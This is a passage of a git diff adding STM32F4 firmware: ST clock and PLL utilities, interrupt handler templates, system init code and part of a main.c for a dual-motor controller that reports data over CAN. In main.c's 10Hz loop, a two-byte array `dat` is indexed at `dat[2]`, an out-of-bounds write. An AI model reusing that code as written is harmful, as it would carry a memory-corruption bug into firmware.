BUS prescalers. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: Max frequency configuration done + * - ERROR: Max frequency configuration not done + */ +ErrorStatus LL_PLL_ConfigSystemClock_HSE(uint32_t HSEFrequency, uint32_t HSEBypass, + LL_UTILS_PLLInitTypeDef *UTILS_PLLInitStruct, LL_UTILS_ClkInitTypeDef *UTILS_ClkInitStruct) +{ + ErrorStatus status = SUCCESS; + uint32_t pllfreq = 0U; + + /* Check the parameters */ + assert_param(IS_LL_UTILS_HSE_FREQUENCY(HSEFrequency)); + assert_param(IS_LL_UTILS_HSE_BYPASS(HSEBypass)); + + /* Check if one of the PLL is enabled */ + if(UTILS_PLL_IsBusy() == SUCCESS) + { + /* Calculate the new PLL output frequency */ + pllfreq = UTILS_GetPLLOutputFrequency(HSEFrequency, UTILS_PLLInitStruct); + + /* Enable HSE if not enabled */ + if(LL_RCC_HSE_IsReady() != 1U) + { + /* Check if need to enable HSE bypass feature or not */ + if(HSEBypass == LL_UTILS_HSEBYPASS_ON) + { + LL_RCC_HSE_EnableBypass(); + } + else + { + LL_RCC_HSE_DisableBypass(); + } + + /* Enable HSE */ + LL_RCC_HSE_Enable(); + while (LL_RCC_HSE_IsReady() != 1U) + { + /* Wait for HSE ready */ + } + } + + /* Configure PLL */ + LL_RCC_PLL_ConfigDomain_SYS(LL_RCC_PLLSOURCE_HSE, UTILS_PLLInitStruct->PLLM, UTILS_PLLInitStruct->PLLN, + UTILS_PLLInitStruct->PLLP); + + /* Enable PLL and switch system clock to PLL */ + status = UTILS_EnablePLLAndSwitchSystem(pllfreq, UTILS_ClkInitStruct); + } + else + { + /* Current PLL configuration cannot be modified */ + status = ERROR; + } + + return status; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup UTILS_LL_Private_Functions + * @{ + */ +/** + * @brief Function to check that PLL can be modified + * @param PLL_InputFrequency PLL input frequency (in Hz) + * @param UTILS_PLLInitStruct pointer to a @ref LL_UTILS_PLLInitTypeDef structure that contains + * the configuration information for the PLL. + * @retval PLL output frequency (in Hz) + */ +static uint32_t UTILS_GetPLLOutputFrequency(uint32_t PLL_InputFrequency, LL_UTILS_PLLInitTypeDef *UTILS_PLLInitStruct) +{ + uint32_t pllfreq = 0U; + + /* Check the parameters */ + assert_param(IS_LL_UTILS_PLLM_VALUE(UTILS_PLLInitStruct->PLLM)); + assert_param(IS_LL_UTILS_PLLN_VALUE(UTILS_PLLInitStruct->PLLN)); + assert_param(IS_LL_UTILS_PLLP_VALUE(UTILS_PLLInitStruct->PLLP)); + + /* Check different PLL parameters according to RM */ + /* - PLLM: ensure that the VCO input frequency ranges from @ref UTILS_PLLVCO_INPUT_MIN to @ref UTILS_PLLVCO_INPUT_MAX MHz. */ + pllfreq = PLL_InputFrequency / (UTILS_PLLInitStruct->PLLM & (RCC_PLLCFGR_PLLM >> RCC_PLLCFGR_PLLM_Pos)); + assert_param(IS_LL_UTILS_PLLVCO_INPUT(pllfreq)); + + /* - PLLN: ensure that the VCO output frequency is between @ref UTILS_PLLVCO_OUTPUT_MIN and @ref UTILS_PLLVCO_OUTPUT_MAX .*/ + pllfreq = pllfreq * (UTILS_PLLInitStruct->PLLN & (RCC_PLLCFGR_PLLN >> RCC_PLLCFGR_PLLN_Pos)); + assert_param(IS_LL_UTILS_PLLVCO_OUTPUT(pllfreq)); + + /* - PLLP: ensure that max frequency at @ref RCC_MAX_FREQUENCY Hz is reached */ + pllfreq = pllfreq / (((UTILS_PLLInitStruct->PLLP >> RCC_PLLCFGR_PLLP_Pos) + 1) * 2); + assert_param(IS_LL_UTILS_PLL_FREQUENCY(pllfreq)); + + return pllfreq; +} + +/** + * @brief Function to check that PLL can be modified + * @retval An ErrorStatus enumeration value: + * - SUCCESS: PLL modification can be done + * - ERROR: PLL is busy + */ +static ErrorStatus UTILS_PLL_IsBusy(void) +{ + ErrorStatus status = SUCCESS; + + /* Check if PLL is busy*/ + if(LL_RCC_PLL_IsReady() != 0U) + { + /* PLL configuration cannot be modified */ + status = ERROR; + } + +#if defined(RCC_PLLSAI_SUPPORT) + /* Check if PLLSAI is busy*/ + if(LL_RCC_PLLSAI_IsReady() != 0U) + { + /* PLLSAI1 configuration cannot be modified */ + status = ERROR; + } +#endif /*RCC_PLLSAI_SUPPORT*/ +#if defined(RCC_PLLI2S_SUPPORT) + /* Check if PLLI2S is busy*/ + if(LL_RCC_PLLI2S_IsReady() != 0U) + { + /* PLLI2S configuration cannot be modified */ + status = ERROR; + } +#endif /*RCC_PLLI2S_SUPPORT*/ + return status; +} + +/** + * @brief Function to enable PLL and switch system clock to PLL + * @param SYSCLK_Frequency SYSCLK frequency + * @param UTILS_ClkInitStruct pointer to a @ref LL_UTILS_ClkInitTypeDef structure that contains + * the configuration information for the BUS prescalers. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: No problem to switch system to PLL + * - ERROR: Problem to switch system to PLL + */ +static ErrorStatus UTILS_EnablePLLAndSwitchSystem(uint32_t SYSCLK_Frequency, LL_UTILS_ClkInitTypeDef *UTILS_ClkInitStruct) +{ + ErrorStatus status = SUCCESS; + uint32_t hclk_frequency = 0U; + + assert_param(IS_LL_UTILS_SYSCLK_DIV(UTILS_ClkInitStruct->AHBCLKDivider)); + assert_param(IS_LL_UTILS_APB1_DIV(UTILS_ClkInitStruct->APB1CLKDivider)); + assert_param(IS_LL_UTILS_APB2_DIV(UTILS_ClkInitStruct->APB2CLKDivider)); + + /* Calculate HCLK frequency */ + hclk_frequency = __LL_RCC_CALC_HCLK_FREQ(SYSCLK_Frequency, UTILS_ClkInitStruct->AHBCLKDivider); + + /* Increasing the number of wait states because of higher CPU frequency */ + if(SystemCoreClock < hclk_frequency) + { + /* Set FLASH latency to highest latency */ + status = LL_SetFlashLatency(hclk_frequency); + } + + /* Update system clock configuration */ + if(status == SUCCESS) + { + /* Enable PLL */ + LL_RCC_PLL_Enable(); + while (LL_RCC_PLL_IsReady() != 1U) + { + /* Wait for PLL ready */ + } + + /* Sysclk activation on the main PLL */ + LL_RCC_SetAHBPrescaler(UTILS_ClkInitStruct->AHBCLKDivider); + LL_RCC_SetSysClkSource(LL_RCC_SYS_CLKSOURCE_PLL); + while (LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_PLL) + { + /* Wait for system clock switch to PLL */ + } + + /* Set APB1 & APB2 prescaler*/ + LL_RCC_SetAPB1Prescaler(UTILS_ClkInitStruct->APB1CLKDivider); + LL_RCC_SetAPB2Prescaler(UTILS_ClkInitStruct->APB2CLKDivider); + } + + /* Decreasing the number of wait states because of lower CPU frequency */ + if(SystemCoreClock > hclk_frequency) + { + /* Set FLASH latency to lowest latency */ + status = LL_SetFlashLatency(hclk_frequency); + } + + /* Update SystemCoreClock variable */ + if(status == SUCCESS) + { + LL_SetSystemCoreClock(hclk_frequency); + } + + return status; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/stm32f4xx_it.c b/body/board/inc/stm32f4xx_it.c new file mode 100644 index 000000000..5a9f5c367 --- /dev/null +++ b/body/board/inc/stm32f4xx_it.c @@ -0,0 +1,169 @@ +/** + ****************************************************************************** + * @file GPIO/GPIO_IOToggle/Src/stm32f4xx_it.c + * @author MCD Application Team + * @brief Main Interrupt Service Routines. + * This file provides template for all exceptions handler and + * peripherals interrupt service routine. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_it.h" + +/** @addtogroup STM32F4xx_HAL_Examples + * @{ + */ + +/** @addtogroup GPIO_IOToggle + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ + +/* Private function prototypes -----------------------------------------------*/ +void HAL_IncTick(void); +/* Private functions ---------------------------------------------------------*/ + +/******************************************************************************/ +/* Cortex-M4 Processor Exceptions Handlers */ +/******************************************************************************/ + +/** + * @brief This function handles NMI exception. + * @param None + * @retval None + */ +void NMI_Handler(void) +{ +} + +/** + * @brief This function handles Hard Fault exception. + * @param None + * @retval None + */ +void HardFault_Handler(void) +{ + /* Go to infinite loop when Hard Fault exception occurs */ + while (1) + { + } +} + +/** + * @brief This function handles Memory Manage exception. + * @param None + * @retval None + */ +void MemManage_Handler(void) +{ + /* Go to infinite loop when Memory Manage exception occurs */ + while (1) + { + } +} + +/** + * @brief This function handles Bus Fault exception. + * @param None + * @retval None + */ +void BusFault_Handler(void) +{ + /* Go to infinite loop when Bus Fault exception occurs */ + while (1) + { + } +} + +/** + * @brief This function handles Usage Fault exception. + * @param None + * @retval None + */ +void UsageFault_Handler(void) +{ + /* Go to infinite loop when Usage Fault exception occurs */ + while (1) + { + } +} + +/** + * @brief This function handles SVCall exception. + * @param None + * @retval None + */ +void SVC_Handler(void) +{ +} + +/** + * @brief This function handles Debug Monitor exception. + * @param None + * @retval None + */ +void DebugMon_Handler(void) +{ +} + +/** + * @brief This function handles PendSVC exception. + * @param None + * @retval None + */ +void PendSV_Handler(void) +{ +} + +/** + * @brief This function handles SysTick Handler. + * @param None + * @retval None + */ +void SysTick_Handler(void) +{ + HAL_IncTick(); +} + +/******************************************************************************/ +/* STM32F4xx Peripherals Interrupt Handlers */ +/* Add here the Interrupt Handler for the used peripheral(s) (PPP), for the */ +/* available peripheral interrupt handler's name please refer to the startup */ +/* file (startup_stm32f4xx.s). */ +/******************************************************************************/ + +/** + * @brief This function handles PPP interrupt request. + * @param None + * @retval None + */ +/*void PPP_IRQHandler(void) +{ +}*/ + + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/system_stm32f4xx.c b/body/board/inc/system_stm32f4xx.c new file mode 100644 index 000000000..048783d32 --- /dev/null +++ b/body/board/inc/system_stm32f4xx.c @@ -0,0 +1,255 @@ +/** + ****************************************************************************** + * @file system_stm32f4xx.c + * @author MCD Application Team + * @brief - CMSIS Cortex-M4 Device Peripheral Access Layer System Source File. + * - This file is dedicated only for STM32F413 NUCLEO 144 boards. + * + * This file provides two functions and one global variable to be called from + * user application: + * - SystemInit(): This function is called at startup just after reset and + * before branch to main program. This call is made inside + * the "startup_stm32f4xx.s" file. + * + * - SystemCoreClock variable: Contains the core clock (HCLK), it can be used + * by the user application to setup the SysTick + * timer or configure other parameters. + * + * - SystemCoreClockUpdate(): Updates the variable SystemCoreClock and must + * be called whenever the core clock is changed + * during program execution. + * + * + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/** @addtogroup CMSIS + * @{ + */ + +/** @addtogroup stm32f4xx_system + * @{ + */ + +/** @addtogroup STM32F4xx_System_Private_Includes + * @{ + */ + + +#include "stm32f4xx.h" + +#if !defined (HSE_VALUE) + #define HSE_VALUE ((uint32_t)8000000) /*!< Default value of the External oscillator in Hz */ +#endif /* HSE_VALUE */ + +#if !defined (HSI_VALUE) + #define HSI_VALUE ((uint32_t)16000000) /*!< Value of the Internal oscillator in Hz*/ +#endif /* HSI_VALUE */ + +/** + * @} + */ + +/** @addtogroup STM32F4xx_System_Private_TypesDefinitions + * @{ + */ + +/** + * @} + */ + +/** @addtogroup STM32F4xx_System_Private_Defines + * @{ + */ + +/************************* Miscellaneous Configuration ************************/ +/*!< Uncomment the following line if you need to relocate your vector Table in + Internal SRAM. */ +/* #define VECT_TAB_SRAM */ +#define VECT_TAB_OFFSET 0x00 /*!< Vector Table base offset field. + This value must be a multiple of 0x200. */ +/******************************************************************************/ + +/** + * @} + */ + +/** @addtogroup STM32F4xx_System_Private_Macros + * @{ + */ + +/** + * @} + */ + +/** @addtogroup STM32F4xx_System_Private_Variables + * @{ + */ + /* This variable is updated in three ways: + 1) by calling CMSIS function SystemCoreClockUpdate() + 2) by calling HAL API function HAL_RCC_GetHCLKFreq() + 3) each time HAL_RCC_ClockConfig() is called to configure the system clock frequency + Note: If you use this function to configure the system clock; then there + is no need to call the 2 first functions listed above, since SystemCoreClock + variable is updated automatically. + */ +uint32_t SystemCoreClock = 16000000; +const uint8_t AHBPrescTable[16] = {0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3, 4, 6, 7, 8, 9}; +const uint8_t APBPrescTable[8] = {0, 0, 0, 0, 1, 2, 3, 4}; +/** + * @} + */ + + +/** @addtogroup STM32F4xx_System_Private_Functions + * @{ + */ + +/** + * @brief Setup the microcontroller system + * Initialize the FPU setting, vector table location and External memory + * configuration. + * @param None + * @retval None + */ +void SystemInit(void) +{ + /* FPU settings ------------------------------------------------------------*/ + #if (__FPU_PRESENT == 1) && (__FPU_USED == 1) + SCB->CPACR |= ((3UL << 10*2)|(3UL << 11*2)); /* set CP10 and CP11 Full Access */ + #endif + /* Reset the RCC clock configuration to the default reset state ------------*/ + /* Set HSION bit */ + RCC->CR |= (uint32_t)0x00000001; + + /* Reset CFGR register */ + RCC->CFGR = 0x00000000; + + /* Reset HSEON, CSSON and PLLON bits */ + RCC->CR &= (uint32_t)0xFEF6FFFF; + + /* Reset PLLCFGR register */ + RCC->PLLCFGR = 0x24003010; + + /* Reset HSEBYP bit */ + RCC->CR &= (uint32_t)0xFFFBFFFF; + + /* Disable all interrupts */ + RCC->CIR = 0x00000000; + + + /* Configure the Vector Table location add offset address ------------------*/ +#ifdef VECT_TAB_SRAM + SCB->VTOR = SRAM_BASE | VECT_TAB_OFFSET; /* Vector Table Relocation in Internal SRAM */ +#else + SCB->VTOR = FLASH_BASE | VECT_TAB_OFFSET; /* Vector Table Relocation in Internal FLASH */ +#endif +} + +/** + * @brief Update SystemCoreClock variable according to Clock Register Values. + * The SystemCoreClock variable contains the core clock (HCLK), it can + * be used by the user application to setup the SysTick timer or configure + * other parameters. + * + * @note Each time the core clock (HCLK) changes, this function must be called + * to update SystemCoreClock variable value. Otherwise, any configuration + * based on this variable will be incorrect. + * + * @note - The system frequency computed by this function is not the real + * frequency in the chip. It is calculated based on the predefined + * constant and the selected clock source: + * + * - If SYSCLK source is HSI, SystemCoreClock will contain the HSI_VALUE(*) + * + * - If SYSCLK source is HSE, SystemCoreClock will contain the HSE_VALUE(**) + * + * - If SYSCLK source is PLL, SystemCoreClock will contain the HSE_VALUE(**) + * or HSI_VALUE(*) multiplied/divided by the PLL factors. + * + * (*) HSI_VALUE is a constant defined in stm32f4xx_hal_conf.h file (default value + * 16 MHz) but the real value may vary depending on the variations + * in voltage and temperature. + * + * (**) HSE_VALUE is a constant defined in stm32f4xx_hal_conf.h file (its value + * depends on the application requirements), user has to ensure that HSE_VALUE + * is same as the real frequency of the crystal used. Otherwise, this function + * may have wrong result. + * + * - The result of this function could be not correct when using fractional + * value for HSE crystal. + * + * @param None + * @retval None + */ +void SystemCoreClockUpdate(void) +{ + uint32_t tmp = 0, pllvco = 0, pllp = 2, pllsource = 0, pllm = 2; + + /* Get SYSCLK source -------------------------------------------------------*/ + tmp = RCC->CFGR & RCC_CFGR_SWS; + + switch (tmp) + { + case 0x00: /* HSI used as system clock source */ + SystemCoreClock = HSI_VALUE; + break; + case 0x04: /* HSE used as system clock source */ + SystemCoreClock = HSE_VALUE; + break; + case 0x08: /* PLL used as system clock source */ + + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLL_M) * PLL_N + SYSCLK = PLL_VCO / PLL_P + */ + pllsource = (RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) >> 22; + pllm = RCC->PLLCFGR & RCC_PLLCFGR_PLLM; + + if (pllsource != 0) + { + /* HSE used as PLL clock source */ + pllvco = (HSE_VALUE / pllm) * ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> 6); + } + else + { + /* HSI used as PLL clock source */ + pllvco = (HSI_VALUE / pllm) * ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> 6); + } + + pllp = (((RCC->PLLCFGR & RCC_PLLCFGR_PLLP) >>16) + 1 ) *2; + SystemCoreClock = pllvco/pllp; + break; + default: + SystemCoreClock = HSI_VALUE; + break; + } + /* Compute HCLK frequency --------------------------------------------------*/ + /* Get HCLK prescaler */ + tmp = AHBPrescTable[((RCC->CFGR & RCC_CFGR_HPRE) >> 4)]; + /* HCLK frequency */ + SystemCoreClock >>= tmp; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/main.c b/body/board/main.c new file mode 100644 index 000000000..74837b17e --- /dev/null +++ b/body/board/main.c @@ -0,0 +1,380 @@ +#include +#include +#include "libc.h" +#include "stm32f4xx_hal.h" +#include "defines.h" +#include "config.h" +#include "setup.h" +#include "util.h" +#include "bldc/BLDC_controller.h" /* BLDC's header file */ +#include "bldc/rtwtypes.h" +#include "version.h" +#include "obj/gitversion.h" +#include "comms.h" +#include "drivers/clock.h" +#include "early_init.h" +#include "drivers/i2c_soft.h" +#include "drivers/angle_sensor.h" +#include "boards.h" + + +//------------------------------------------------------------------------ +// Global variables set externally +//------------------------------------------------------------------------ +extern TIM_HandleTypeDef htim_left; +extern TIM_HandleTypeDef htim_right; +extern ADC_HandleTypeDef hadc; +extern volatile adc_buf_t adc_buffer; + +// Matlab defines - from auto-code generation +//--------------- +extern P rtP_Left; /* Block parameters (auto storage) */ +extern P rtP_Right; /* Block parameters (auto storage) */ +extern ExtY rtY_Left; /* External outputs */ +extern ExtY rtY_Right; /* External outputs */ +extern ExtU rtU_Left; /* External inputs */ +extern ExtU rtU_Right; /* External inputs */ +//--------------- + +// TODO: remove both, unneeded. Also func in util.c too +extern int16_t speedAvg; // Average measured speed +extern int16_t speedAvgAbs; // Average measured speed in absolute + +extern volatile int pwml; // global variable for pwm left. -1000 to 1000 +extern volatile int pwmr; // global variable for pwm right. -1000 to 1000 + +extern uint8_t enable_motors; // global variable for motor enable + +extern int16_t batVoltage; // global variable for battery voltage + +extern int32_t motPosL; +extern int32_t motPosR; + +extern board_t board; + +//------------------------------------------------------------------------ +// Global variables set here in main.c +//------------------------------------------------------------------------ +extern volatile uint32_t buzzerTimer; +volatile uint32_t torque_cmd_timeout = 0U; +volatile uint32_t ignition_off_counter = 0U; + +uint16_t cnt_press = 0; + +int16_t batVoltageCalib; // global variable for calibrated battery voltage +int16_t board_temp_deg_c; // global variable for calibrated temperature in degrees Celsius +volatile int16_t cmdL; // global variable for Left Command +volatile int16_t cmdR; // global variable for Right Command + +uint8_t hw_type; // type of the board detected(0 - base, 3 - knee) +uint8_t ignition = 0; // global variable for ignition on SBU2 line +uint8_t charger_connected = 0; // status of the charger port +uint8_t pkt_idx = 0; // For CAN msg counter +//------------------------------------------------------------------------ +// Local variables +//------------------------------------------------------------------------ +static uint32_t tick_prev = 0U; + +static uint32_t main_loop_1Hz = 0U; +static uint32_t main_loop_1Hz_runtime = 0U; + +static uint32_t main_loop_10Hz = 0U; +static uint32_t main_loop_10Hz_runtime = 0U; + +static uint32_t main_loop_100Hz = 0U; +static uint32_t main_loop_100Hz_runtime = 0U; + +void __initialize_hardware_early(void) { + early_initialization(); +} + +int main(void) { + HAL_Init(); + HAL_NVIC_SetPriorityGrouping(NVIC_PRIORITYGROUP_4); + HAL_NVIC_SetPriority(MemoryManagement_IRQn, 0, 0); + HAL_NVIC_SetPriority(BusFault_IRQn, 0, 0); + HAL_NVIC_SetPriority(UsageFault_IRQn, 0, 0); + HAL_NVIC_SetPriority(SVCall_IRQn, 0, 0); + HAL_NVIC_SetPriority(DebugMonitor_IRQn, 0, 0); + HAL_NVIC_SetPriority(PendSV_IRQn, 0, 0); + HAL_NVIC_SetPriority(SysTick_IRQn, 0, 0); + + SystemClock_Config(); + MX_GPIO_Clocks_Init(); + + __HAL_RCC_DMA2_CLK_DISABLE(); + + board_detect(); + MX_GPIO_Common_Init(); + MX_TIM_Init(); + MX_ADC_Init(); + BLDC_Init(); + + HAL_ADC_Start(&hadc); + + if (hw_type == HW_TYPE_BASE) { + out_enable(POWERSWITCH, true); + out_enable(IGNITION, ignition); + out_enable(TRANSCEIVER, true); + // Loop until button is released, only for base board + while(HAL_GPIO_ReadPin(BUTTON_PORT, BUTTON_PIN)) { HAL_Delay(10); } + } else { + out_enable(POWERSWITCH, false); + ignition = 1; + knee_detected = 1; + } + // Reset LEDs on startup + out_enable(LED_RED, false); + out_enable(LED_GREEN, false); + out_enable(LED_BLUE, false); + + llcan_set_speed(board.CAN, 5000, false, false); + llcan_init(board.CAN); + + SW_I2C_init(); + IMU_soft_init(); + + poweronMelody(); + + int32_t board_temp_adcFixdt = adc_buffer.temp << 16; // Fixed-point filter output initialized with current ADC converted to fixed-point + int16_t board_temp_adcFilt = adc_buffer.temp; + + uint16_t sensor_angle[2] = { 0 }; + uint16_t hall_angle_offset[2] = { 0 }; + + uint16_t unknown_imu_data[6] = { 0 }; + + if (hw_type == HW_TYPE_KNEE) { + angle_sensor_read(sensor_angle); // Initial data to set offsets between angle sensor and hall sensor + hall_angle_offset[0] = (sensor_angle[0] * ANGLE_TO_DEGREES); + hall_angle_offset[1] = (sensor_angle[1] * ANGLE_TO_DEGREES); + } + + while(1) { + if ((HAL_GetTick() - tick_prev) >= 1) { // 1kHz loop + // runs at 100Hz + if ((HAL_GetTick() - (main_loop_100Hz - main_loop_100Hz_runtime)) >= 10) { + main_loop_100Hz_runtime = HAL_GetTick(); + + calcAvgSpeed(); + + if (ignition == 0) { + cmdL = cmdR = 0; + enable_motors = 0; + } + + if (!enable_motors || (torque_cmd_timeout > 10)) { + cmdL = cmdR = 0; + } + + if (ignition == 1 && enable_motors == 0 && (!rtY_Left.z_errCode && !rtY_Right.z_errCode) && (ABS(cmdL) < 50 && ABS(cmdR) < 50)) { + beepShort(6); // make 2 beeps indicating the motor enable + beepShort(4); + HAL_Delay(100); + cmdL = cmdR = 0; + enable_motors = 1; // enable motors + } + + if (hw_type == HW_TYPE_KNEE) { + // Safety to stop operation if angle sensor reading failed TODO: adjust sensivity and add lowpass to angle sensor? + fault_status.left_angle = (ABS((hall_angle_offset[0] + ((motPosL / 15 / GEARBOX_RATIO_LEFT) % 360)) - (sensor_angle[0] * ANGLE_TO_DEGREES)) > 5); + fault_status.right_angle = (ABS((hall_angle_offset[1] + ((motPosR / 15 / GEARBOX_RATIO_RIGHT) % 360)) - (sensor_angle[1] * ANGLE_TO_DEGREES)) > 5); + + if (fault_status.left_angle || fault_status.right_angle) { + cmdL = cmdR = 0; + } + // Safety to stop movement when reaching dead angles, around 20 and 340 degrees + if (((sensor_angle[0] < 900) && (cmdL < 0)) || ((sensor_angle[0] > 15500) && (cmdL > 0))) { + cmdL = 0; + } + if (((sensor_angle[1] < 900) && (cmdR < 0)) || ((sensor_angle[1] > 15500) && (cmdR > 0))) { + cmdR = 0; + } + } + + if (ABS(cmdL) < 10) { + rtP_Left.n_cruiseMotTgt = 0; + rtP_Left.b_cruiseCtrlEna = 1; + } else { + rtP_Left.b_cruiseCtrlEna = 0; + if (hw_type == HW_TYPE_KNEE) { + pwml = -CLAMP((int)cmdL, -TRQ_LIMIT_LEFT, TRQ_LIMIT_LEFT); + } else { + pwml = CLAMP((int)cmdL, -TORQUE_BASE_MAX, TORQUE_BASE_MAX); + } + } + if (ABS(cmdR) < 10) { + rtP_Right.n_cruiseMotTgt = 0; + rtP_Right.b_cruiseCtrlEna = 1; + } else { + rtP_Right.b_cruiseCtrlEna = 0; + if (hw_type == HW_TYPE_KNEE) { + pwmr = -CLAMP((int)cmdR, -TRQ_LIMIT_RIGHT, TRQ_LIMIT_RIGHT); + } else { + pwmr = -CLAMP((int)cmdR, -TORQUE_BASE_MAX, TORQUE_BASE_MAX); + } + } + + if (ignition_off_counter <= IGNITION_OFF_DELAY) { + // MOTORS_DATA: speed_L(2), speed_R(2), counter(1), checksum(1) + uint8_t dat[8]; + uint16_t speedL = rtY_Left.n_mot; + uint16_t speedR = -(rtY_Right.n_mot); // Invert speed sign for the right wheel + dat[0] = (speedL >> 8U) & 0xFFU; + dat[1] = speedL & 0xFFU; + dat[2] = (speedR >> 8U) & 0xFFU; + dat[3] = speedR & 0xFFU; + dat[4] = 0; + dat[5] = 0; + dat[6] = pkt_idx; + dat[7] = crc_checksum(dat, 7, crc_poly); + can_send_msg((0x201U + board.can_addr_offset), ((dat[7] << 24U) | (dat[6] << 16U) | (dat[5]<< 8U) | dat[4]), ((dat[3] << 24U) | (dat[2] << 16U) | (dat[1] << 8U) | dat[0]), 8U); + ++pkt_idx; + pkt_idx &= 0xFU; + + //MOTORS_CURRENT: left_pha_ab(2), left_pha_bc(2), right_pha_ab(2), right_pha_bc(2) + dat[0] = (rtU_Left.i_phaAB >> 8U) & 0xFFU; + dat[1] = rtU_Left.i_phaAB & 0xFFU; + dat[2] = (rtU_Left.i_phaBC >> 8U) & 0xFFU; + dat[3] = rtU_Left.i_phaBC & 0xFFU; + dat[4] = (rtU_Right.i_phaAB >> 8U) & 0xFFU; + dat[5] = rtU_Right.i_phaAB & 0xFFU; + dat[6] = (rtU_Right.i_phaBC >> 8U) & 0xFFU; + dat[7] = rtU_Right.i_phaBC & 0xFFU; + can_send_msg((0x204U + board.can_addr_offset), ((dat[7] << 24U) | (dat[6] << 16U) | (dat[5] << 8U) | dat[4]), ((dat[3] << 24U) | (dat[2] << 16U) | (dat[1] << 8U) | dat[0]), 8U); + + uint16_t left_hall_angle; + uint16_t right_hall_angle; + if (hw_type == HW_TYPE_KNEE) { + angle_sensor_read(sensor_angle); + left_hall_angle = hall_angle_offset[0] + ((motPosL / 15 / GEARBOX_RATIO_LEFT) % 360); + right_hall_angle = hall_angle_offset[1] + ((motPosR / 15 / GEARBOX_RATIO_RIGHT) % 360); + } else { + left_hall_angle = motPosL / 15; + right_hall_angle = -motPosR / 15; + } + //MOTORS_ANGLE: left angle sensor(2), right angle sensor(2), left hall angle(2), right hall angle(2) + dat[0] = (sensor_angle[0]>>8U) & 0xFFU; + dat[1] = sensor_angle[0] & 0xFFU; + dat[2] = (sensor_angle[1]>>8U) & 0xFFU; + dat[3] = sensor_angle[1] & 0xFFU; + dat[4] = (left_hall_angle>>8U) & 0xFFU; + dat[5] = left_hall_angle & 0xFFU; + dat[6] = (right_hall_angle>>8U) & 0xFFU; + dat[7] = right_hall_angle & 0xFFU; + can_send_msg((0x205U + board.can_addr_offset), ((dat[7] << 24U) | (dat[6] << 16U) | (dat[5] << 8U) | dat[4]), ((dat[3] << 24U) | (dat[2] << 16U) | (dat[1] << 8U) | dat[0]), 8U); + + IMU_soft_sensor_read(unknown_imu_data); + //BOARD_IMU_RAW1: FIXME: add comment after discovering data, looks like magnetometer + dat[0] = (unknown_imu_data[0]>>8U) & 0xFFU; + dat[1] = unknown_imu_data[0] & 0xFFU; + dat[2] = (unknown_imu_data[1]>>8U) & 0xFFU; + dat[3] = unknown_imu_data[1] & 0xFFU; + dat[4] = (unknown_imu_data[2]>>8U) & 0xFFU; + dat[5] = unknown_imu_data[2] & 0xFFU; + can_send_msg((0x206U + board.can_addr_offset), ((dat[5] << 8U) | dat[4]), ((dat[3] << 24U) | (dat[2] << 16U) | (dat[1] << 8U) | dat[0]), 6U); + + //BOARD_IMU_RAW2: FIXME: add comment after discovering data, looks like acceleration? + dat[0] = (unknown_imu_data[3]>>8U) & 0xFFU; + dat[1] = unknown_imu_data[3] & 0xFFU; + dat[2] = (unknown_imu_data[4]>>8U) & 0xFFU; + dat[3] = unknown_imu_data[4] & 0xFFU; + dat[4] = (unknown_imu_data[5]>>8U) & 0xFFU; + dat[5] = unknown_imu_data[5] & 0xFFU; + can_send_msg((0x207U + board.can_addr_offset), ((dat[5] << 8U) | dat[4]), ((dat[3] << 24U) | (dat[2] << 16U) | (dat[1] << 8U) | dat[0]), 6U); + } + torque_cmd_timeout = (torque_cmd_timeout < MAX_uint32_T) ? (torque_cmd_timeout+1) : 0; + main_loop_100Hz_runtime = HAL_GetTick() - main_loop_100Hz_runtime; + main_loop_100Hz = HAL_GetTick(); + } + + // runs at 10Hz + if ((HAL_GetTick() - (main_loop_10Hz - main_loop_10Hz_runtime)) >= 100) { + main_loop_10Hz_runtime = HAL_GetTick(); + if (ignition_off_counter <= IGNITION_OFF_DELAY) { + // VAR_VALUES: fault_status(0:4), enable_motors(0:1), ignition(0:1), left motor error(1), right motor error(1) + uint8_t dat[2]; + dat[0] = ((fault_status.right_angle << 5U) | (fault_status.right_i2c << 4U) | (fault_status.left_angle << 3U) | (fault_status.left_i2c << 2U) | (enable_motors << 1U) | ignition); + dat[1] = rtY_Left.z_errCode; + dat[2] = rtY_Right.z_errCode; + can_send_msg((0x202U + board.can_addr_offset), 0x0U, ((dat[2] << 16U) | (dat[1] << 8U) | dat[0]), 3U); + } + out_enable(LED_GREEN, ignition); + + main_loop_10Hz_runtime = HAL_GetTick() - main_loop_10Hz_runtime; + main_loop_10Hz = HAL_GetTick(); + } + + // runs at 1Hz + if ((HAL_GetTick() - (main_loop_1Hz - main_loop_1Hz_runtime)) >= 1000) { + main_loop_1Hz_runtime = HAL_GetTick(); + // ####### CALC BOARD TEMPERATURE ####### + filtLowPass32(adc_buffer.temp, TEMP_FILT_COEF, &board_temp_adcFixdt); + 